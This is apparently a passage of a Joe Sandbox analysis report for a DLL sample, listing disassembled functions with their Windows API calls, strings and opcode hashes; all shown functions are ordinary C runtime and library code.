Opcode ID: 3bbf0a3ff4d999ac66e599ef6cb6b8dc20522a7a4199bbfd0d1b7637d49334f2
Instruction ID: fdfa5da59a41c69d770a77e2e5e5a62a0cc185adaa772f84303fff4246806acb
Opcode Fuzzy Hash: 3bbf0a3ff4d999ac66e599ef6cb6b8dc20522a7a4199bbfd0d1b7637d49334f2
Instruction Fuzzy Hash: F511293261469882EBF75B12E0407FD23A5E748BE0F54D226FB6D876C4CE35CA89C740

Function 000000018002B2D4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001E728: GetLastError.KERNEL32 ref: 000000018001E737
Part of subcall function 000000018001E728: FlsGetValue.KERNEL32 ref: 000000018001E74C
Part of subcall function 000000018001E728: SetLastError.KERNEL32 ref: 000000018001E7D7

EnumSystemLocalesW.KERNEL32 ref: 000000018002B352

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: c9c5342b379c57ab0150a5fffd80dd54dece838cf4b96978f3358284292ed427
Instruction ID: 60f316c509a31cab0b341cafa3ce5a2bc64ff983118f8a4c0b21916c01fab903
Opcode Fuzzy Hash: c9c5342b379c57ab0150a5fffd80dd54dece838cf4b96978f3358284292ed427
Instruction Fuzzy Hash: D501F77270428886E7939F16E4407EE77E2E748BE4F85C222E674C72C5CF748A89C700

Function 0000000180020400 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32 ref: 000000018002044F

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: b5b3c1051f5835f7d7149c7bfc662b17047e65df67ef0a7d5bdbe949e04d0c61
Instruction ID: a968ee2affecc7876812a42df4829ce9c5e47f40f6e2a6ab4c91571be2d4e57f
Opcode Fuzzy Hash: b5b3c1051f5835f7d7149c7bfc662b17047e65df67ef0a7d5bdbe949e04d0c61
Instruction Fuzzy Hash: 38F06472300A4883E781EB6AE8807DA6361F38CBD0F58C025EE0983365CF38C6698300

Function 0000000180026368 Relevance: 1.4, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000000018002640D

Part of subcall function 0000000180020318: HeapAlloc.KERNEL32 ref: 000000018002036D

Part of subcall function 0000000180020390: HeapFree.KERNEL32 ref: 00000001800203A6
Part of subcall function 0000000180020390: GetLastError.KERNEL32 ref: 00000001800203B0

Part of subcall function 000000018002CBFC: _invalid_parameter_noinfo.LIBCMT ref: 000000018002CC2F

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
String ID:
API String ID: 916656526-0
Opcode ID: 25765d56bc907ccdcaefe51a2217d35461dc767b68f20450cd161fe34d8239c3
Instruction ID: dcbd0cd38eefc9fde9e3d697c2db2125d6f606459b4b88168451cc8f10a5d8c4
Opcode Fuzzy Hash: 25765d56bc907ccdcaefe51a2217d35461dc767b68f20450cd161fe34d8239c3
Instruction Fuzzy Hash: DD41D531B0174942FAE3AB266911BEAA7917B8D7C1F54C125BE8947BD6EE38C6098700

Function 0000000180017EAC Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

PATH, xrefs: 0000000180017EFF

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID: PATH
API String ID: 485612231-1036084923
Opcode ID: 12877fb9e35b8f9ccd32f8bd4c779acdd47ed51d6ddf4d8725f6b7c82602485a
Instruction ID: f294ddcc12cb67506cc741d6af2e2d597a29e1f5a58ed0d91be004146bde7499
Opcode Fuzzy Hash: 12877fb9e35b8f9ccd32f8bd4c779acdd47ed51d6ddf4d8725f6b7c82602485a
Instruction Fuzzy Hash: 5C41AC31704B4C46FBE7EA2269117EB57916B8CBD4F18C538BE4A06AC6DE38C74A8300

Function 0000000180029078 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000018002907C

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 9f4a8859c378c4f8c507b988a8d8dac4beecda5213c1e2a71b28d7e58fe6b73f
Instruction ID: 5edc27d0106fdd8c548a4b58017f0f1f2fd10e91d98f41bcedb1606919c3a67f
Opcode Fuzzy Hash: 9f4a8859c378c4f8c507b988a8d8dac4beecda5213c1e2a71b28d7e58fe6b73f
Instruction Fuzzy Hash: 2CB09234A13A88C6EA8B2B116C8638423A47B4C751F89815A840C90320DF2C12ED5700

Function 000000018001A25C Relevance: .5, Instructions: 535COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0abc4254457fbe9b14aa2f38dc423a23a88374dbbe6177bdd068ae7f7df4946
Instruction ID: 4cc10b237cccb7d0cd9e4c5704d5ebd0b36738ffd66ce45bdb1454f12583730c
Opcode Fuzzy Hash: c0abc4254457fbe9b14aa2f38dc423a23a88374dbbe6177bdd068ae7f7df4946
Instruction Fuzzy Hash: 46423031A29E4C89E7D38F35A852797B764BB5E3C4F42D317F80A77661DF28864A8700

Function 000000018001F0F4 Relevance: .3, Instructions: 309COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorLast$CodePageValidValue_invalid_parameter_noinfo
String ID:
API String ID: 749689494-0
Opcode ID: 621795843cc14baf226767717043f222cd4f1eb84deeda168aeb6775143a8d79
Instruction ID: 702e665b2f9b3a1b8fc5bc711dc2b2bb92b2309f0db9e3324f519036aea9ed14
Opcode Fuzzy Hash: 621795843cc14baf226767717043f222cd4f1eb84deeda168aeb6775143a8d79
Instruction Fuzzy Hash: B6C19176204A8886EBB29F62D8107FA67A1F7997C8F50C115FE4987B99DF38C649C700

Function 000000018002A914 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorLastValue$InfoLocale
String ID:
API String ID: 673564084-0
Opcode ID: 3db3807c31cd8e69087d2a99885d638a2879662b2c6e136a49bd79c713779470
Instruction ID: 27d050cf470a3e9d81023fb3c9e724586e265d98fe280e2e587df70b86cc154c
Opcode Fuzzy Hash: 3db3807c31cd8e69087d2a99885d638a2879662b2c6e136a49bd79c713779470
Instruction Fuzzy Hash: D9B1DF7261864887FBA7DF21D5117EA33A1E789BD8F40C221EE46836CADF78C649C740

Function 0000000180019570 Relevance: .2, Instructions: 207COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c1877338eff1f6ef94147a5dcd0adff617f05a7fca7a442ecefb2ad5e1c9febd
Instruction ID: f433b7f4c754cd38f8bd9f4ac0a0ef3bbdea15e3ab906a50d364a8bba0eaab5d
Opcode Fuzzy Hash: c1877338eff1f6ef94147a5dcd0adff617f05a7fca7a442ecefb2ad5e1c9febd
Instruction Fuzzy Hash: D981A172211E5886EBA2CF65D4953AD23A0FB48BE8F148616FE1E97BD5CF34C2458300

Function 000000018001D418 Relevance: .1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 8e107df9b9fa6c34bd97bf980de7fa2a54ce0ffb2cd774617c4e1924f44abc17
Instruction ID: caa79277b60bd04c88e1e88e7a70e409240e6dafe2ad1ce8c3d30f82e1f73cfb
Opcode Fuzzy Hash: 8e107df9b9fa6c34bd97bf980de7fa2a54ce0ffb2cd774617c4e1924f44abc17
Instruction Fuzzy Hash: 86418D32310E5886EB85DF6AD9543A9A3A1A74CFD4F499126EE0D87B58DE3CC64A8300

Function 0000000180031138 Relevance: .1, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7c343e24b78bee9cf551e0c29d37adf6fe6f3b2d10b0bc81013352adf0aed2c
Instruction ID: 72c500e67e8621d7a4c7810b0039dc758cf0b8e9c9a6ea0fd223a4f5aca5fa15
Opcode Fuzzy Hash: a7c343e24b78bee9cf551e0c29d37adf6fe6f3b2d10b0bc81013352adf0aed2c
Instruction Fuzzy Hash: EC3159AF54D9C91EF2E3892808A73CA1FD6A76F795F0FD04AD750872C3E9460A0D8712

Function 0000000180026C40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16d6e40f226c55b0540e149cd154960650b61aef3abad3d2d841604dc9b0d41b
Instruction ID: a39e4f4435e0de6f70c23f60816157ba36e014d700355a2f8f114e8c1715c108
Opcode Fuzzy Hash: 16d6e40f226c55b0540e149cd154960650b61aef3abad3d2d841604dc9b0d41b
Instruction Fuzzy Hash: 04F0C2727142998AEBE99F28A843B5937D4E30C3C0F90C019EAD8C7F44CA7CC1608F04

Function 0000000180031398 Relevance: .0, Instructions: 9COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: defd09c7aae756fbc4d062d1b122eae1dde2a1210c7d27f47c395cd648841b80
Instruction ID: 8f607acba34ea1df1ce918e3a77be950b31f8771d1848159d4c4afbaba3c626a
Opcode Fuzzy Hash: defd09c7aae756fbc4d062d1b122eae1dde2a1210c7d27f47c395cd648841b80
Instruction Fuzzy Hash: 83C0020344E3C54AD3530E2008752982F76979AD55B8E80A3C680CA687D95D59098322

Function 0000000180031298 Relevance: .0, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec950d75495105142ce9aac6b5e009c1c68d44d228b20ab03adb6c422acf0ca0
Instruction ID: 5ff10e0c1402ccb9f4f6c46362c854e644d50c7127326df01e89a0dd17e6edc6
Opcode Fuzzy Hash: ec950d75495105142ce9aac6b5e009c1c68d44d228b20ab03adb6c422acf0ca0
Instruction Fuzzy Hash: E1C04C5740D5C54DE2E34A5408A77D61FD6577F665E0D905A9A408A282DA0B091E4306

Function 000000018000F478 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018000F48E
GetModuleHandleW.KERNEL32 ref: 000000018000F49B
GetModuleHandleW.KERNEL32 ref: 000000018000F4B0
GetProcAddress.KERNEL32 ref: 000000018000F4C8
GetProcAddress.KERNEL32 ref: 000000018000F4DB
CreateEventW.KERNEL32 ref: 000000018000F507
DeleteCriticalSection.KERNEL32 ref: 000000018000F553
CloseHandle.KERNEL32 ref: 000000018000F565

Strings

WakeAllConditionVariable, xrefs: 000000018000F4CE
api-ms-win-core-synch-l1-2-0.dll, xrefs: 000000018000F494
kernel32.dll, xrefs: 000000018000F4A9
SleepConditionVariableCS, xrefs: 000000018000F4BE

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: ed90b81432497c4b859a9c3bf5ef7a66474fd916561c46bd2aac4d4b979fe3fb
Instruction ID: cbebca51c4cc6e0d70743121d3da2ae35706941860834bdbb1d6ed5ddfa749fa
Opcode Fuzzy Hash: ed90b81432497c4b859a9c3bf5ef7a66474fd916561c46bd2aac4d4b979fe3fb
Instruction Fuzzy Hash: E5212F30206E4D81FBDBDB20F8943E663A0AB5C7D5F958435E91E46BA4EE6CC79D9300

Function 000000018001DA70 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 489COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018001DAB4
_invalid_parameter_noinfo.LIBCMT ref: 000000018001DE8C
_invalid_parameter_noinfo.LIBCMT ref: 000000018001E137

Strings

0, xrefs: 000000018001DEDC
p, xrefs: 000000018001DBDE
p, xrefs: 000000018001DB66
f, xrefs: 000000018001DBD6

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0$f$p$p
API String ID: 3215553584-1202675169
Opcode ID: a400f4d6ddb8362c6aec6d52de1fac8102090504894833b68446e73e98ce2a99
Instruction ID: 11bff1775e5d7b1454ddd3c7813a19f9c753771ecc1359fcefccb368a0916bf8
Opcode Fuzzy Hash: a400f4d6ddb8362c6aec6d52de1fac8102090504894833b68446e73e98ce2a99
Instruction Fuzzy Hash: 8612C232A04A8D86FBA6AE14D0447EE76A1F7997D4F84C017F6924B6C4DF78C788CB41

Function 0000000180013128 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000000180013185

Part of subcall function 000000018001547C: __GetUnwindTryBlock.LIBCMT ref: 00000001800154BF
Part of subcall function 000000018001547C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000001800154E4

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000000018001325D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000001800134B2
std::bad_alloc::bad_alloc.LIBCMT ref: 00000001800135BE

Strings

csm, xrefs: 0000000180013280
csm, xrefs: 000000018001319F
csm, xrefs: 0000000180013206

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 81a25778146e0d6eeb8abd376adb8dbd0f59147a0d35ae46c3990907e9707109
Instruction ID: d90ae95ed40332b4dc6248853f6d3a5668452e214fcdd056a9b5dc864f03a5b0
Opcode Fuzzy Hash: 81a25778146e0d6eeb8abd376adb8dbd0f59147a0d35ae46c3990907e9707109
Instruction Fuzzy Hash: 7EE1AC72600F488AEBA29F65D4823DD7BA1F749BD8F008115FE8957B9ACF34D299C700

Function 000000018002047C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00000001800205FB
GetProcAddress.KERNEL32 ref: 0000000180020607

Strings

api-ms-, xrefs: 0000000180020545
ext-ms-, xrefs: 0000000180020558

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: c5647d1f7021cd8e1440370bdee1227c149ea6fc6fcf673f38dbc1a952e58484
Instruction ID: b59831e635f17b9e32cfd3f20f68095807fafd9e8d2ac9a04546aa57c863f69a
Opcode Fuzzy Hash: c5647d1f7021cd8e1440370bdee1227c149ea6fc6fcf673f38dbc1a952e58484
Instruction Fuzzy Hash: 4141E071311B1885FB97DB16A8043DA6396B74CBE0F58C626AD1A8B7C5EF3CC6498740

Function 000000018000FDAC Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000FDD4
__scrt_acquire_startup_lock.LIBCMT ref: 000000018000FE26
_RTC_Initialize.LIBCMT ref: 000000018000FE54
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000000018000FE7A
__scrt_release_startup_lock.LIBCMT ref: 000000018000FEA5

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: c671e8edf16b6119a35364c15aade4144dcb4b1bcb76ba1d69248f1abadabaff
Instruction ID: 1d43224e53c1c126d3c8d5e56bdaad7cec8874dc05a55f6b1f6c85ba31c66aaf
Opcode Fuzzy Hash: c671e8edf16b6119a35364c15aade4144dcb4b1bcb76ba1d69248f1abadabaff
Instruction Fuzzy Hash: 4E819A31600A4D8AFBE7EB2694413E97291BB8E7C0F14C035BA4987B97DE79CB4D9710

Function 00000001800179F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180017A0B
_invalid_parameter_noinfo.LIBCMT ref: 0000000180017A48
_invalid_parameter_noinfo.LIBCMT ref: 0000000180017A7D

Strings

r, xrefs: 0000000180017A38
w, xrefs: 0000000180017AD7
w, xrefs: 0000000180017A33

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: r$w$w
API String ID: 3215553584-72812343
Opcode ID: 37d64a06e7c11df08195b57a90dfe86cfbe72b67997bc8cfaa1438fc6a606d90
Instruction ID: 13dcfeeab2a0b6585ad6b0194e04978f6cb12ac79bb9787eda62b15cc1e7063f
Opcode Fuzzy Hash: 37d64a06e7c11df08195b57a90dfe86cfbe72b67997bc8cfaa1438fc6a606d90
Instruction Fuzzy Hash: DD41B632349A9C46FB9397A0D0113DEA7A19B897D0F848510B688076C7DF6CCB4DCB02

Function 00000001800159CC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000000180015A51
GetLastError.KERNEL32 ref: 0000000180015A5F
LoadLibraryExW.KERNEL32 ref: 0000000180015A89
FreeLibrary.KERNEL32 ref: 0000000180015ACF
GetProcAddress.KERNEL32 ref: 0000000180015ADB

Strings

api-ms-, xrefs: 0000000180015A71

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 49d0a66d137787552c44d6f2863af4c81916d3e3236c0c7d877f95ccd00bbb91
Instruction ID: 0ad59f9e4a14db282165644c3098f23c2390531325c91ed4fdab3e559cf2f7aa
Opcode Fuzzy Hash: 49d0a66d137787552c44d6f2863af4c81916d3e3236c0c7d877f95ccd00bbb91
Instruction Fuzzy Hash: FE31A731312E48D5EF93DB02A4407D96394FB4CBE6F99C616BDA90B790EF78C6498701

Function 000000018001E728 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000000018001E737
FlsGetValue.KERNEL32 ref: 000000018001E74C
FlsSetValue.KERNEL32 ref: 000000018001E76D
FlsSetValue.KERNEL32 ref: 000000018001E79A
FlsSetValue.KERNEL32 ref: 000000018001E7AB
FlsSetValue.KERNEL32 ref: 000000018001E7BC
SetLastError.KERNEL32 ref: 000000018001E7D7

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6b7bf9f1553cc049d70359f7db8bdc3f57d627e80023453169fa93f48adc11c1
Instruction ID: 546d590ee40adf6c25efc08dcd9945e6d9155c7d3c0dfceb1e9f6753c16d939f
Opcode Fuzzy Hash: 6b7bf9f1553cc049d70359f7db8bdc3f57d627e80023453169fa93f48adc11c1
Instruction Fuzzy Hash: 34213E34208B8C47FBDBA77155453EE62925B8D7F4F24C725B93607AD7DF2886094701

Function 000000018002EAB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000000018002EAE1
GetLastError.KERNEL32 ref: 000000018002EAED
CloseHandle.KERNEL32 ref: 000000018002EB05
CreateFileW.KERNEL32 ref: 000000018002EB30
WriteConsoleW.KERNEL32 ref: 000000018002EB4F

Strings

CONOUT$, xrefs: 000000018002EB11

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: b6d21a9b080e1f3e9edc3813c040a1a7656d0b01059017150e95ae98ae1b39da
Instruction ID: c6c0dfb59ff521c6ab07a974f04b29fd83111acf2c1a0e54063ffe81b5a76142
Opcode Fuzzy Hash: b6d21a9b080e1f3e9edc3813c040a1a7656d0b01059017150e95ae98ae1b39da
Instruction Fuzzy Hash: E8118231310B448AE7939B56E85839AA3A1F78DFE5F058214FE5E877A4DF78CA488740

Function 000000018000F180 Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 000000018000F1F2
MultiByteToWideChar.KERNEL32 ref: 000000018000F29A
LCMapStringEx.KERNEL32 ref: 000000018000F2D1
LCMapStringEx.KERNEL32 ref: 000000018000F32A
LCMapStringEx.KERNEL32 ref: 000000018000F3D7
WideCharToMultiByte.KERNEL32 ref: 000000018000F419

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: c3dac3b0c0cb94f640fb70ba04b0d9a3ce45078aff36ae02d1181d243b6802de
Instruction ID: aed9e30ce9a8dfa6e08bf5170395a9ea161629b3b877c947486cb4f6f631e34b
Opcode Fuzzy Hash: c3dac3b0c0cb94f640fb70ba04b0d9a3ce45078aff36ae02d1181d243b6802de
Instruction Fuzzy Hash: EA81823220074886EBB2CF21E4403AA77A1FB48BE8F448225FE5957FD8DF78C6499700

Function 0000000180013600 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000000018001379E
std::bad_alloc::bad_alloc.LIBCMT ref: 0000000180013AC1

Strings

csm, xrefs: 0000000180013747
csm, xrefs: 00000001800136E5
csm, xrefs: 00000001800137C5

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
